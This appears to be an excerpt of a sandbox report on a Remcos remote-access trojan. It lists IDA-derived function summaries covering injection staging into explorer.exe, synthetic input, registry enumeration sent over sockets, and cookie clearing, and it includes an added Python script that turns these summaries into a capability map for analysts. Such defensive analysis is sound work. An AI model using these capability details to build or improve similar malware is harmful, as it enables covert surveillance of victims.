                            • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
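The function summaries above (dxdiag-based host inventory, NtAllocateVirtualMemory staging against explorer.exe, the hidden console that prints the "Remcos v" / "5.1.1 Pro" banner, waveIn microphone capture, SendInput, the ".part" download rename and the TCP/UDP forwarding strings) are easier to read as a capability map than as raw IDA-plugin blocks. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of the Remcos sample. It parses the report's own block layout (bullet API lines, `String ID` lists joined with `$`, `Opcode ID`, a closing `Instruction Fuzzy Hash` line) and tags each function with a coarse label. The capability rules and the `SAMPLE` text are the author's assumptions: the sample is three summaries copied from this page, and the rules are heuristics, not anything the report asserts.

```python
"""Turn Joe Sandbox "IDA Plugin" function summaries into a capability map.

Added example, not code from the report or from the Remcos sample. The
capability rules below are the author's own heuristics (assumption).
"""
import re

# Constructed sample input: three summaries copied from this report's layout.
SAMPLE = """\
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• Sleep.KERNEL32(00000064), ref: 0041755C
• DeleteFileW.KERNEL32(00000000), ref: 00417590
Strings
Memory Dump Source
• Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\\sysinfo.txt$dxdiag$open$temp
• Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
• Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
APIs
• GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
Strings
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\\explorer.exe$explorer.exe$windir
• Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
• Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
APIs
• AllocConsole.KERNEL32 ref: 0041CE35
• GetConsoleWindow.KERNEL32 ref: 0041CE3B
• ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
• String ID: Remcos v$5.1.1 Pro$CONOUT$
• Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
• Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
"""

# "• Name.MODULE(args), ref: addr", "• Name.MODULE ref: addr", optionally
# behind a "Part of subcall function XXXX:" prefix (subcalls count too).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\S+?)\.([A-Z][A-Z0-9_]*)(?:\(|\s+ref:|\s*$)"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(.*)$")
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*([0-9a-f]{64})")

# Heuristic capability rules (assumption): label, predicate(apis, strings).
RULES = [
    ("host reconnaissance via dxdiag",
     lambda a, s: "ShellExecuteW" in a and "dxdiag" in s),
    ("memory allocation in explorer.exe (injection staging)",
     lambda a, s: any("NtAllocateVirtualMemory" in x for x in s) and "explorer.exe" in s),
    ("hidden console (version banner)",
     lambda a, s: "AllocConsole" in a and "ShowWindow" in a),
    ("microphone capture", lambda a, s: any(x.startswith("waveIn") for x in a)),
    ("synthetic keyboard/mouse input", lambda a, s: "SendInput" in a),
    ("download to temporary .part file",
     lambda a, s: ".part" in s and "MoveFileW" in a),
    ("TCP/UDP port forwarding",
     lambda a, s: "StartForward" in s or "StartReverse" in s),
    ("tray icon branded 'Remcos'",
     lambda a, s: "Shell_NotifyIconA" in a and "Remcos" in s),
]


def _new():
    return {"opcode_id": None, "apis": set(), "strings": []}


def parse_summaries(text):
    """Split report text into one record per function (closed by the fuzzy-hash line)."""
    records, cur = [], _new()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].add(m.group(1))
            continue
        m = STRING_RE.match(line)
        if m:
            # The report joins strings with '$'; a literal '$' (e.g. CONOUT$) is lost.
            cur["strings"].extend(t for t in m.group(1).split("$") if t)
            continue
        m = OPCODE_RE.match(line)
        if m:
            cur["opcode_id"] = m.group(1)
            continue
        if line.lstrip().startswith("• Instruction Fuzzy Hash"):
            records.append(cur)
            cur = _new()
    return records


def classify(rec):
    return [label for label, pred in RULES if pred(rec["apis"], rec["strings"])]


def find_version(records):
    """Reassemble the 'Remcos v' + '5.1.1 Pro' pair the report splits at '$'."""
    for rec in records:
        s = rec["strings"]
        for i, tok in enumerate(s[:-1]):
            if tok.startswith("Remcos v"):
                return tok + s[i + 1]
    return None


def triage(text):
    records = parse_summaries(text)
    for rec in records:
        rec["capabilities"] = classify(rec)
    return records, find_version(records)


if __name__ == "__main__":
    recs, ver = triage(SAMPLE)
    print("version banner:", ver)
    for r in recs:
        print(r["opcode_id"][:12], sorted(r["apis"]), r["capabilities"])
```

Feed it the full report text instead of `SAMPLE` to get one row per function; the `Opcode ID` is the stable key for comparing runs against other Remcos dumps. Because the report separates strings with `$`, a string that itself contains `$` (the `CONOUT$` device name here) cannot be recovered exactly, so treat string-based rules as indicators rather than exact matches.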
                            APIs
                            • SendInput.USER32 ref: 00419A25
                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                              • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InputSend$Virtual
                            • String ID:
                            • API String ID: 1167301434-0
                            • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                            • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                            • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                            • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16_free
                            • String ID: a/p$am/pm$h{D
                            • API String ID: 2936374016-2303565833
                            • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                            • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                            • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                            • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                            APIs
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • _free.LIBCMT ref: 00444E87
                            • _free.LIBCMT ref: 00444E9E
                            • _free.LIBCMT ref: 00444EBD
                            • _free.LIBCMT ref: 00444ED8
                            • _free.LIBCMT ref: 00444EEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID: KED
                            • API String ID: 3033488037-2133951994
                            • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                            • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                            • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                            • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]$xUG$TG
                            • API String ID: 3554306468-1165877943
                            • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                            • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                            • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                            • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                            APIs
                            • GetConsoleCP.KERNEL32 ref: 100094D4
                            • __fassign.LIBCMT ref: 1000954F
                            • __fassign.LIBCMT ref: 1000956A
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                            APIs
                            • GetConsoleCP.KERNEL32 ref: 0044B47E
                            • __fassign.LIBCMT ref: 0044B4F9
                            • __fassign.LIBCMT ref: 0044B514
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                            • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                            • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                            • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                            • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                            APIs
                            • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                              • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                              • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumInfoOpenQuerysend
                            • String ID: xUG$NG$NG$TG
                            • API String ID: 3114080316-2811732169
                            • Opcode ID: 45ce03b6782cd753b7e5a82f0aafb309821f1a3d97b9e276ee7b54a3a4dbf0fc
                            • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                            • Opcode Fuzzy Hash: 45ce03b6782cd753b7e5a82f0aafb309821f1a3d97b9e276ee7b54a3a4dbf0fc
                            • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                            APIs
                              • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                              • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                              • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                              • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                            • _wcslen.LIBCMT ref: 0041B7F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                            • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                            • API String ID: 3286818993-122982132
                            • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                            • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                            • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                            • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                            APIs
                              • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                              • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                              • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                            • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                            • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                            • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                            • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                            • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                            • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                            • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                            • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                            • CloseHandle.KERNEL32(00000000), ref: 0041C508
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerWrite
                            • String ID: xpF
                            • API String ID: 1852769593-354647465
                            • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                            • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                            • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                            • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                            APIs
                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                            • _free.LIBCMT ref: 100092AB
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 100092B6
                            • _free.LIBCMT ref: 100092C1
                            • _free.LIBCMT ref: 10009315
                            • _free.LIBCMT ref: 10009320
                            • _free.LIBCMT ref: 1000932B
                            • _free.LIBCMT ref: 10009336
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                            APIs
                              • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                            • _free.LIBCMT ref: 00450FC8
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00450FD3
                            • _free.LIBCMT ref: 00450FDE
                            • _free.LIBCMT ref: 00451032
                            • _free.LIBCMT ref: 0045103D
                            • _free.LIBCMT ref: 00451048
                            • _free.LIBCMT ref: 00451053
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                            • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                            • int.LIBCPMT ref: 004111BE
                              • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                              • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                            • std::_Facet_Register.LIBCPMT ref: 004111FE
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: (mG
                            • API String ID: 2536120697-4059303827
                            • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                            • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                            • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                            • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                            APIs
                            • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                            • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                            • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                            • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                            • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                            APIs
                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                              • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                              • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                            • CoUninitialize.OLE32 ref: 00407664
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
